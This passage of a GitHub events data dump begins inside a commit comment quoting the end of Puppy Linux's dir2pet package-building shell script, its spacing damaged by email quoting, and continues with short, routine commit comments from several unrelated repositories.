usr/local/bin/abiword (the \n> executable)\"\n>      echo  \"and usr/share/applications/abiword.desktop (the XDG menu file).\"\n>      echo  \"Whatever the packages needs, though don't worry if there is no .desktop\"\n>      echo  \"file as this script will ask some simple questions and optionally create\"\n>      echo  \"one. The package only needs a .desktop file if a menu entry is to be\"\n>      echo  \"created, and also an icon is required for the menu.\"\n>      echo\n>      echo  \"The directory $BASEPKG must separate name of the package and\"\n>      echo  \"version number with a dash. Ex: abiword-0.5.6\"\n>      echo\n>      echo  \"The package may optionally have post-install and post-remove scripts,\"\n>      echo  \"named 'pinstall.sh' and 'puninstall.sh' placed at the top directory.\"\n>      echo  \"(to create official PETs for the Unleashed suite, see its README file\"\n>      echo  \" for more information how to create these scripts properly)\"\n>      echo\n>      echo  \"If any of the above needs to be further sorted out, you can quit this\"\n>      echo  \"script right now by pressing CTRL-C, otherwise just press ENTER\"\n>      case  $comp  in\n>          xz)default=xz char=\"g\"  other=gzip;;\n>          gz)default=gzip char=\"x\"  other=xz;;\n>      esac\n>      echo\"to use the default \\\"$default\\\" compression or \\\"$char\\\" then ENTER for \"\n>      echo\"\\\"$other\\\" compression.\"\n>      echo -n\"Press ENTER key or \\\"$char\\\" and ENTER to continue: \"\n>      read goforit\n>      case$goforit  in\n>      x)EXT=\"xz\"  \n>      echo\n>      echo\"xz compression chosen.\"  \n>      sleep 1;;\n>      g)EXT=\"gz\"\n>      echo\n>      echo\"gzip compression chosen.\"  \n>      sleep 1;;\n>      *)EXT=\"${default:0:2}\"  ;;\n>      esac #131122, 131123, 140715\n> else\n>      EXT=$comp\n> fi\n> # end comp\n> . /etc/xdg/menus/hierarchy #has PUPHIERARCHY variable.\n>\n> DESKTOPFILE=\"\"\n> ADESKTOPFILE=\"`find $ADIR -type f -name \\*.desktop`\"\n> [\"$ADESKTOPFILE\"  !=\"\"  ] && DESKTOPFILE=\"yes\"\n>\n> if [\"$skip\"  != 1 ];then\n>      echo\n>      echo -en\"\\\\033[1;31mStep 1\"  #red\n>      echo -e\"\\\\033[0;39m\"\n>      if [\"$DESKTOPFILE\"  =\"\"  ];then\n>       echo\"Currently there is no .desktop file (they are usually at \n> usr/share/applications\"\n>       echo\"or usr/local/share/applications), so perhaps this package is not \n> supposed to\"\n>       echo\"have a menu entry? You can optionally create one though...\"\n>       echo\"If you know that the ${BASEPKG} application does not require\"\n>       echo\"a menu entry, press the ENTER key only.\"\n>       echo\"If a menu entry is required, type any printable character then ENTER.\"\n>       echo\"(if in doubt, just press ENTER key)\"\n>       echo -n\"Type a printable character or just ENTER key: \"\n>       read YESMENU\n>       [\"$YESMENU\"  =\"\"  ] && DESKTOPFILE=\"ignore\"\n>      else #w476\n>       echo\"A .desktop file was found here:\"\n>       echo\"$ADESKTOPFILE\"\n>       echo\"So this application will have a menu entry.\"\n>       echo\"If you want to change the .desktop file in any way, open it in a text \n> editor\"\n>       echo\"right now, before proceeding and make any changes you want.\"\n>       echo\"In particular, check that the icon exists, and that 'Category' entry \n> fits\"\n>       echo\"into Puppy's menu hierarchy (see file /etc/xdg/menus/hierarchy).\"\n>       echo\"After satisfying yourself that the .desktop file is ok, press the \n> ENTER key\"\n>       echo\"to continue this script.\"\n>       echo\"Or, type 'ignore' to build pet pkg as if there is no .desktop file.\"\n>       echo\"Or, type 'new' if you would like this script to ask a series of\"\n>       echo -n\"questions and rebuild the .desktop file from scratch: \"\n>       read NEWMENU\n>       [\"$NEWMENU\"  =\"ignore\"  ] && DESKTOPFILE=\"ignore\"  #w478\n>       if [\"$NEWMENU\"  =\"new\"  ];then\n>        for ONEDESKTOP in$ADESKTOPFILE\n>        do\n>         BASEDESK=\"`basename $ONEDESKTOP .desktop`\"\n>         DIRDESK=\"`dirname $ONEDESKTOP`\"\n>         echo\"Moving ${DIRDESK}/${BASEDESK}.desktop to /tmp\"\n>         mv -f${DIRDESK}/${BASEDESK}.desktop /tmp/\n>        done\n>        DESKTOPFILE=\"\"\n>       fi\n>      fi\n>\n>      PUPAPPLICATION=\"\"\n>      PUPEXECUTABLE=\"\"\n>      PUPICON16=\"\"\n>      PUPAPPLICATION=\"\"\n>      if [\"$DESKTOPFILE\"  =\"yes\"  ];then #w476\n>       #get some info out of it...\n>       FIRSTDESKTOPFILE=\"`echo -n \"$ADESKTOPFILE\" | head -n 1`\"\n>       PUPCATEGORY=\"`cat $FIRSTDESKTOPFILE | grep '^Categories=' | cut -f 2 -d '='`\"\n>       PUPEXECUTABLE=\"`cat $FIRSTDESKTOPFILE | grep '^Exec=' | cut -f 2 -d '='`\"\n>       PUPICON16=\"`cat $FIRSTDESKTOPFILE | grep '^Icon=' | cut -f 2 -d '='`\"\n>       PUPMENUDESCR=\"`cat $FIRSTDESKTOPFILE | grep '^Comment=' | cut -f 2 -d '='`\"\n>       [\"$PUPMENUDESCR\"  =\"\"  ] && PUPMENUDESCR=\"`cat $FIRSTDESKTOPFILE | grep '^Name=' | cut -f 2 -d '='`\"\n>       [\"$PUPMENUDESCR\"  =\"\"  ] && PUPMENUDESCR=\"`cat $FIRSTDESKTOPFILE | grep '^GenericName=' | cut -f 2 -d '='`\"\n>      fi\n>\n>      if [\"$DESKTOPFILE\"  =\"\"  ];then\n>       echo\n>       echo -en\"\\\\033[1;31mStep 1B\"  #red\n>       echo -e\"\\\\033[0;39m\"\n>       echo\"Please type the category in which you want the application\"\n>       echo\"to create a window manager menu entry. The official Puppy\"\n>       echo\"has a menu hierarchy as follows:\"\n>       echo\"('X-' categories are unofficial, Puppy-specific)\"\n>       echo\"$PUPHIERARCHY\"\n>       echo\n>       echo -n\"Type one word from the CATEGORIES column: \"\n>       read PUPCATEGORY\n>\n>       echo\n>       echo -en\"\\\\033[1;31mStep 1C\"  #red\n>       echo -e\"\\\\033[0;39m\"\n>       echo\"Please enter the name of the executable. If it is in the\"\n>       echo\"executable-search-path, namely /bin, /sbin, /usr/bin,\"\n>       echo\"/usr/sbin, /root/my-applications/bin or /usr/local/bin,\"\n>       echo\"then you only need to enter the name of the executable\"\n>       echo\"not the path. Example: mtpaint\"\n>       echo\"(of course, if you need to specify the path here, it is\"\n>       echo\" the path AFTER the package is installed)\"\n>       echo\n>       echo -n\"Enter [path]executable: \"\n>       read PUPEXECUTABLE\n>\n>       echo\n>       echo -en\"\\\\033[1;31mStep 1D\"  #red\n>       echo -e\"\\\\033[0;39m\"\n>       echo\"Please enter the name of the icon that is to be used in\"\n>       echo\"the window manager menu entry.\"\n>       echo\"It is preferred that you specify the full path.\"\n>       echo\n>       echo -n\"Please type [path]icon: \"\n>       read PUPICON16\n>\n>       echo\n>       echo -en\"\\\\033[1;31mStep 1E\"  #red\n>       echo -e\"\\\\033[0;39m\"\n>       echo\"Please enter the name of the application, as you wish it to\"\n>       echo\"appear in the menu. It will be the first word in the menu entry.\"\n>       echo\"Example: Abiword\"\n>       echo\n>       echo -n\"Type application name: \"\n>       read PUPAPPLICATION\n>      fi\n>\n>      if [\"$PUPMENUDESCR\"  =\"\"  ];then #w476\n>       echo\n>       echo -en\"\\\\033[1;31mDescription\"  #red\n>       echo -e\"\\\\033[0;39m\"\n>       echo\"Please enter a description of 1-3 words.\"\n>       if [\"$DESKTOPFILE\"  =\"\"  ];then\n>        echo\"This must be extremely short. as it will appear in the window\"\n>        echo\"manager menu entry immediately after the application name.\"\n>       fi\n>       echo\"This may be used for various purposes, such by PETget for package\"\n>       echo\"management purposes.\"\n>       echo\"Example for Abiword: powerful wordprocessor\"\n>       echo\n>       echo -n\"Type the VERY SHORT description (without quotes): \"\n>       read PUPMENUDESCR\n>       echo\n>      fi\n>\n>      #if pkg is a split-off, already has a known dependency...\n>      DEPBASE=\"\";DEPNOTE=\"\"\n>      [ !\"`echo -n \"$NAMEONLY\" | grep '_DEV'`\"  =\"\"  ] &&  DEPBASE=\"+`echo -n \"$NAMEONLY\" | sed -e 's/_DEV//g'`\"\n>      [ !\"`echo -n \"$NAMEONLY\" | grep '_DOC'`\"  =\"\"  ] &&  DEPBASE=\"+`echo -n \"$NAMEONLY\" | sed -e 's/_DOC//g'`\"\n>      [ !\"`echo -n \"$NAMEONLY\" | grep '_NLS'`\"  =\"\"  ] &&  DEPBASE=\"+`echo -n \"$NAMEONLY\" | sed -e 's/_NLS//g'`\"\n>      if [ !\"$DEPBASE\"  =\"\"  ];then\n>       DEPNOTE=\"NOTE5: It is strongly suggested that you at least enter ${DEPBASE}\n> the main package\n> \"\n>      fi\n>\n>      if [\"$PUPOFFICIALDEPS\"  =\"\"  ];then\n>       echo\n>       echo -en\"\\\\033[1;31mDependencies\"  #red\n>       echo -e\"\\\\033[0;39m\"\n>       echo\"Please enter a dependency-list for the PET package that is now being\"\n>       echo\"created. Packages already built-in to Puppy do not need to be\"\n>       echo\"explicitly named as dependencies (except a cut-down barebones version\"\n>       echo\"of Puppy may not have all of these built in, so you may have to\"\n>       echo\"think of the worst-case situation).\"\n>       echo\"How to enter this dependency-list is shown by an example: the package\"\n>       echo\"'pupdvdtool-0.5b' has the following dependency list:\"\n>       echo\"+vamps,+vobcopy,+ffmpeg,+dvdauthor,+gtkdialog3\"\n>       echo\"Each package name is preceded by a '+' and delimited by a ','.\"\n>       echo\"NOTE1: that 'gtkdialog3' requires the GTK libraries, but it is not\"\n>       echo\" necessary to specify sub-dependencies, as if 'gtkdialog3'\"\n>       echo\" needs to be installed it has its own dependency list.\"\n>       echo\"NOTE2: You can lookup the dependency-list of each package in the\"\n>       echo\" /root/.packages/Packages-* database files\"\n>       echo\"NOTE3: it is not required to specify package version numbers,\"\n>       echo\" VERSION NUMBERS NOT YET SUPPORTED BY PACKAGE MANAGER\"\n>       echo\"NOTE4: If you don't know what to specify, just press ENTER key\"\n>       echo\" (the package manager will still do some basic dependency checking)\"\n>       echo\"$DEPNOTE\"\n>       echo -n\"Type dependency-list: \"\n>       read PUPOFFICIALDEPS\n>      fi\n>\n>      echo\n>      echo -en\"\\\\033[1;31mGUI window\"  #red\n>      echo -e\"\\\\033[0;39m\"\n>\n>      #create tarball...\n>      rm -f$DIRPKG/${BASEPKG}.tar 2>/dev/null\n>      rm -f$DIRPKG/${BASEPKG}.tar.${EXT}  2>/dev/null\n>      rm -f$DIRPKG/${BASEPKG}.pet 2>/dev/null\n>      if [\"$DESKTOPFILE\"  =\"\"  ];then\n>       mkdir -p$DIRPKG/$BASEPKG/usr/share/applications\n>       echo'[Desktop Entry]'  >$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo'Encoding=UTF-8'  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"Name=${PUPAPPLICATION} ${PUPMENUDESCR}\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"Icon=${PUPICON16}\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"Comment=${PUPAPPLICATION} ${PUPMENUDESCR}\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"Exec=${PUPEXECUTABLE}\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"Terminal=false\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"Type=Application\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"Categories=${PUPCATEGORY}\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\"GenericName=${PUPAPPLICATION} ${PUPMENUDESCR}\"  >>$DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop\n>       echo\n>       echo\"File $DIRPKG/$BASEPKG/usr/share/applications/${NAMEONLY}.desktop \n> created.\"\n>       echo\n>      fi\n>\n>      #100201 determine if pkg is ditro-independent (scripts only)...\n>      ARCHINDEPENDENT='yes'\n>      for ONEEXEC in`find $DIRPKG/$BASEPKG -maxdepth 6 -type f -perm -o+x`\n>      do\n>       [ -f$ONEEXEC  ] && [\"`file $ONEEXEC | grep ' ELF '`\"  !=\"\"  ] && ARCHINDEPENDENT='no'\n>      done\n>      [\"`find $DIRPKG/$BASEPKG -maxdepth 6 -type f -name '*.a' -o -type f \n> -name 'lib*.so*' -o -type f -name '*.la'`\"  !=\"\"  ] && ARCHINDEPENDENT='no'  #100303\n>      #[\"`echo \"${BASEPKG}\" | grep '_DEV'`\"  !=\"\"  ] && ARCHINDEPENDENT='no'  #100303\n>      [\"$ARCHINDEPENDENT\"  =\"yes\"  ] && ARCHDEPENDENT='no'\n>\n>      echo\"Press ENTER key to bring up a GUI window that will help you to create\"\n>      echo\"a database entry for the package. This will be shown in a text editor\"\n>      echo\"for saving somewhere, also written to file 'pet.specs' inside the pkg.\"  \n>      echo -n\"Press ENTER: \"\n>      read enternow\n> fi\n>\n> SIZEK=\"`du -s -k $DIRPKG/$BASEPKG | cut -f 1`\"  #w476\n>\n> if [\"$skip\"  != 1 ];then\n>      [\"${PUPCATEGORY}\"  =\"\"  ] && PUPCATEGORY=\"EMPTY\"\n>      #if PUPCATEGORY is in format'entry1;entry2;'  extract only'entry2'...\n>      xPUPCATEGORY=\"`echo -n \"$PUPCATEGORY\" | tr ';' ' ' | tr -s ' ' | sed -e 's% $%%' | \n> rev | cut -f 1 -d ' ' | rev`\"\n>      TOPCAT=\"`echo \"$PUPHIERARCHY\" | grep -e \"[ ,]$xPUPCATEGORY[ ,]\" -e \"[ \n> ,]$xPUPCATEGORY\\$\" | cut -f 1 -d ' ' | head -n 1`\"  #160524\n>      [\"${TOPCAT}\"  =\"\"  ] && TOPCAT=\"EMPTY\"\n>      [\"${PUPOFFICIALDEPS}\"  =\"\"  ] && PUPOFFICIALDEPS=\"EMPTY\"\n>      [ -z\"${PUPMENUDESCR}\"  ] && PUPMENUDESCR=\"EMPTY\"\n>      [\"${PUPPATH}\"  =\"\"  ] && PUPPATH=\"EMPTY\"  #100201\n>      [\"${DEFREPO}\"  =\"\"  ] && DEFREPO=\"EMPTY\"  #100201\n>      echo\"a${NAMEONLY}\"  \"b${TOPCAT}\"  \"c${PUPOFFICIALDEPS}\"  \"d${PUPMENUDESCR}\"  \"e$BASEPKG\"  \"f$SIZEK\"  \"g$PUPPATH\"  \"h$ARCHDEPENDENT\"  \"i$DEFREPO\"\n>      petspec\"${NAMEONLY}\"  \"${TOPCAT}\"  \"${PUPOFFICIALDEPS}\"  \"${PUPMENUDESCR}\"  \"$BASEPKG\"  \"$SIZEK\"  \"$PUPPATH\"  \"$ARCHDEPENDENT\"  \"$DEFREPO\"  #100201\n>      if [$?  -ne 0 ];then\n>       echo\"Aborted creation of PET package.\"\n>       exit\n>      fi\n>\n> else\n>      . /etc/DISTRO_SPECS\n>      PUPOFFICIALDEPS=\"$deps\"\n>      TOPCAT=\"$category\"\n>      [ -z\"$TOPCAT\"  ] && TOPCAT=BuildingBlock\n>      PUPMENUDESCR=\"$desc\"\n>      [ -z\"${PUPMENUDESCR}\"  ] && PUPMENUDESCR=\"No description provided\"\n>      xPATTERN=\"s%${NAMEONLY}%%\"\n>      VERSION=\"`echo -n \"$BASEPKG\" | sed -e \"$xPATTERN\" -e 's%^\\\\-%%'`\"\n>      ARCHINDEPENDENT='yes'\n>      for ONEEXEC in`find $DIRPKG/$BASEPKG -maxdepth 6 -type f -perm -o+x`\n>      do\n>       [ -f$ONEEXEC  ] && [\"`file $ONEEXEC | grep ' ELF '`\"  !=\"\"  ] && ARCHINDEPENDENT='no'\n>      done\n>      [\"`find $DIRPKG/$BASEPKG -maxdepth 6 -type f -name '*.a' -o -type f \n> -name 'lib*.so*' -o -type f -name '*.la'`\"  !=\"\"  ] && ARCHINDEPENDENT='no'\n>      [\"$ARCHINDEPENDENT\"  =\"no\"  ] && COMPAT=$DISTRO_BINARY_COMPAT  V=$DISTRO_COMPAT_VERSION\n>      echo\"$BASEPKG|${NAMEONLY}|$VERSION||$TOPCAT|$SIZEK||${BASEPKG}.pet|$deps|$PUPMENUDESCR|$COMPAT|$V||\"  > /tmp/petspec_db_entry\n> fi\n>\n>\n> [ -d$DIRPKG/$BASEPKG/tmp ] && chmod 1777$DIRPKG/$BASEPKG/tmp #130305 rerwin.\n>\n> cat /tmp/petspec_db_entry | tail -n 1 >$DIRPKG/$BASEPKG/pet.specs\n>\n> echo\n> echo\"Creating package...\"\n> tar -c -f$DIRPKG/${BASEPKG}.tar$DIRPKG/$BASEPKG/\n> sync\n> case$EXT  in\n> xz)xz -z -9 -e$DIRPKG/${BASEPKG}.tar ;;\n> gz)gzip --best$DIRPKG/${BASEPKG}.tar ;;\n> esac\n> TARBALL=\"$DIRPKG/${BASEPKG}.tar.${EXT}\"\n>\n> echo\n> echo\"File $DIRPKG/${BASEPKG}.tar.${EXT} created. Now converting to .pet...\"\n> FULLSIZE=\"`stat --format=%s ${TARBALL}`\"\n> MD5SUM=\"`md5sum $TARBALL | cut -f 1 -d ' '`\"\n> echo -n\"$MD5SUM\"  >>$TARBALL\n> sync\n> mv -f$TARBALL  $DIRPKG/${BASEPKG}.pet\n> sync\n>\n> echo\n> echo\"${BASEPKG}.pet has been created. Finished.\"\n> echo\n> echo\"If you look in ${BASEPKG} you will see the new '.specs' file.\"\n> if [\"$DESKTOPFILE\"  =\"\"  ];then\n>   echo\"And in $BASEPKG/usr/share/applications/ the new '.desktop' file.\"\n> fi\n> echo\"Directory $BASEPKG is now configured correctly as a PET package\"\n> echo\"and in future you do not need to go through this script again.\"\n> echo\"You could manually edit the files if required, and create another\"\n> echo\".pet package just by doing this:\"\n> echo\"# tar -c -f ${BASEPKG}.tar ${BASEPKG}/\"\n> case$EXT  in\n> xz)echo\"# xz -z -9 -e ${BASEPKG}.tar\"  ;;\n> gz)echo\"# gzip --best ${BASEPKG}.tar\"  ;;\n> esac\n> echo\"# tgz2pet ${BASEPKG}.tar.${EXT}\"\n> echo\n> echo\"dir2pet exited.\"\n>\n> ###END###\n>\n> I've done a bit of testing in interactive and skip modes and all seems \n> working as expected. I think there is no need of a special case for \n> arm devices these days as there are some very fast ones around.\n>\n> Cheers\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/puppylinux-woof-CE/woof-CE/commit/cd80fb134b90b0b3833f160cb34cf2b211a94d24#commitcomment-18970482>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ASod5uwzTMGXODIVFYqBvBeMlDD6Cgb2ks5qodjVgaJpZM4J3W4K>.\n>\n\n"}},"created_at":"2016-09-12T12:03:08Z"}
{"id":"4548874057","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18983642,"position":null,"line":null,"path":null,"commit_id":"2006a09de07c5710652aa9d90f80e77f7f6118f8","created_at":"2016-09-12T12:03:30Z","updated_at":"2016-09-12T12:03:30Z","body":"👍 "}},"created_at":"2016-09-12T12:03:30Z"}
{"id":"4548877702","type":"CommitCommentEvent","actor":{"login":"tarun-pc"},"repo":{"name":"jpillora/cloud-torrent"},"payload":{"comment":{"id":18983651,"position":null,"line":null,"path":null,"commit_id":"210e609851255b848f61b2d45f7cdf401dd91698","created_at":"2016-09-12T12:04:17Z","updated_at":"2016-09-12T12:04:17Z","body":"is there any other way to deploy on heroku or to download torrent (except using torrent client)"}},"created_at":"2016-09-12T12:04:17Z"}
{"id":"4548886804","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18983675,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T12:06:31Z","updated_at":"2016-09-12T12:06:31Z","body":"once Denis and Tammo finished their view refactorisation, it could be very useful to rewrite them with twig or mustache: no more PHP. "}},"created_at":"2016-09-12T12:06:31Z"}
{"id":"4548894385","type":"CommitCommentEvent","actor":{"login":"lmartinet"},"repo":{"name":"lmartinet/ISTEX_MentalRotation"},"payload":{"comment":{"id":18983695,"position":45,"line":87,"path":"IstexDoc2Vec.py","commit_id":"1d9d2704f5f94561b82e684d24f51188ac27018d","created_at":"2016-09-12T12:08:24Z","updated_at":"2016-09-12T12:08:24Z","body":"I would only test : self.wiki_count >= max_nb_wiki_paragraphs\r\nand put  max_nb_wiki_paragraphs = 0 for the default value (I also add a comment for that in the main function)"}},"created_at":"2016-09-12T12:08:24Z"}
{"id":"4548895804","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18983698,"position":81,"line":81,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:08:44Z","updated_at":"2016-09-12T12:08:44Z","body":"для верстки формы используются теги fieldset и legend, почитайте про них пожалуйста http://www.wisdomweb.ru/HTML5d/html5_fieldset.php"}},"created_at":"2016-09-12T12:08:44Z"}
{"id":"4548897897","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18983707,"position":87,"line":87,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:09:14Z","updated_at":"2016-09-12T12:09:14Z","body":"То же самое - переделать с fieldset и legend"}},"created_at":"2016-09-12T12:09:14Z"}
{"id":"4548898858","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18983710,"position":100,"line":100,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:09:28Z","updated_at":"2016-09-12T12:09:28Z","body":"То же самое - переделать с fieldset и legend"}},"created_at":"2016-09-12T12:09:28Z"}
{"id":"4548900367","type":"CommitCommentEvent","actor":{"login":"JosephSilber"},"repo":{"name":"JosephSilber/bouncer"},"payload":{"comment":{"id":18983719,"position":null,"line":null,"path":null,"commit_id":"492982c40c6e7df88dc084872c3a99ee3acfcfe4","created_at":"2016-09-12T12:09:50Z","updated_at":"2016-09-12T12:09:50Z","body":"I'm really curious what you're using them for. Can you give me a real-world example from your project where you use the query scopes? \n"}},"created_at":"2016-09-12T12:09:50Z"}
{"id":"4548902742","type":"CommitCommentEvent","actor":{"login":"kekelzpekel"},"repo":{"name":"NativeScript/nativescript-sdk-examples-ng"},"payload":{"comment":{"id":18983724,"position":3,"line":3,"path":"app/overview.md","commit_id":"bf622f44fa7b8850e3cbc61e44e78a7d810fc8b0","created_at":"2016-09-12T12:10:22Z","updated_at":"2016-09-12T12:10:22Z","body":"typo in word common (when I share the article ie. on Slack the typo appears)"}},"created_at":"2016-09-12T12:10:22Z"}
{"id":"4548903543","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18983727,"position":114,"line":114,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:10:34Z","updated_at":"2016-09-12T12:10:34Z","body":"элементы сортировки должны быть ссылками"}},"created_at":"2016-09-12T12:10:34Z"}
{"id":"4548906543","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/ezark"},"payload":{"comment":{"id":18983734,"position":null,"line":null,"path":null,"commit_id":"745151fef9ce79e9430520f4bd0568ccf3325cfe","created_at":"2016-09-12T12:11:15Z","updated_at":"2016-09-12T12:11:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5KHFzWXa&#x2F;8-permettre-la-saisie-du-naan-dans-ezmaster\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Permettre la saisie du NAAN dans ezmaster</a>"}},"created_at":"2016-09-12T12:11:15Z"}
{"id":"4548908054","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18983739,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T12:11:35Z","updated_at":"2016-09-12T12:11:35Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg?logoWidth=100)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg?logoWidth=100)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg?logoWidth=100)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg?logoWidth=100)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg?logoWidth=100)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg?logoWidth=100)](#)\n"}},"created_at":"2016-09-12T12:11:35Z"}
{"id":"4548908282","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18983740,"position":null,"line":null,"path":null,"commit_id":"e22f215a20ec104a6de57fb207a3032209f7a178","created_at":"2016-09-12T12:11:38Z","updated_at":"2016-09-12T12:11:38Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;AUykjShI&#x2F;10-permettre-de-modifier-le-nom-de-la-base-mongo-dans-le-fichier-de-conf\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Permettre de modifier le nom de la base mongo dans le fichier de conf</a>"}},"created_at":"2016-09-12T12:11:38Z"}
{"id":"4548909468","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18983741,"position":null,"line":null,"path":null,"commit_id":"56de1492bbf4e7973217be3dab609b0a4031c356","created_at":"2016-09-12T12:11:55Z","updated_at":"2016-09-12T12:11:55Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;AUykjShI&#x2F;10-permettre-de-modifier-le-nom-de-la-base-mongo-dans-le-fichier-de-conf\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Permettre de modifier le nom de la base mongo dans le fichier de conf</a>"}},"created_at":"2016-09-12T12:11:55Z"}
{"id":"4548911401","type":"CommitCommentEvent","actor":{"login":"michaeljota"},"repo":{"name":"BrainsoftLtd/ng2-admin"},"payload":{"comment":{"id":18983748,"position":null,"line":null,"path":null,"commit_id":"b76bae21a6398f0af698a4f6c4d30a46532e1615","created_at":"2016-09-12T12:12:22Z","updated_at":"2016-09-12T12:12:22Z","body":"Hi! How does this goes? Can you call rederer inside the app? I want to run this app inside electron, but I've not been able to do a electron require inside the app itself.\r\n\r\nWhat I did was to compile the entire app with target 'electron-renderer', that I guess it does what its name says, but it did not work well. "}},"created_at":"2016-09-12T12:12:22Z"}
{"id":"4548912197","type":"CommitCommentEvent","actor":{"login":"glennreyes"},"repo":{"name":"treasure-data/redux-search"},"payload":{"comment":{"id":18983750,"position":null,"line":null,"path":null,"commit_id":"fa0845eb47fd05e7a6e40db8ea40f7cfed984691","created_at":"2016-09-12T12:12:33Z","updated_at":"2016-09-12T12:12:33Z","body":"Wooohooo! 🎉 @bvaughn "}},"created_at":"2016-09-12T12:12:33Z"}
{"id":"4548912406","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18983752,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T12:12:36Z","updated_at":"2016-09-12T12:12:36Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T12:12:36Z"}
{"id":"4548912665","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"Khaon/android_kernel_samsung_a3xelte"},"payload":{"comment":{"id":18983756,"position":null,"line":null,"path":null,"commit_id":"449336a6f0854b71998b9ede727b47bb91c96406","created_at":"2016-09-12T12:12:40Z","updated_at":"2016-09-12T12:12:40Z","body":"Tern off this, because OIS doesn't work with a3xlte camera"}},"created_at":"2016-09-12T12:12:40Z"}
{"id":"4548916926","type":"CommitCommentEvent","actor":{"login":"Sunny609"},"repo":{"name":"Sunny609/test"},"payload":{"comment":{"id":18983768,"position":null,"line":null,"path":null,"commit_id":"2524a5f028c9dc81988246c3223019f83ce44a6c","created_at":"2016-09-12T12:13:40Z","updated_at":"2016-09-12T12:13:40Z","body":"test01"}},"created_at":"2016-09-12T12:13:40Z"}
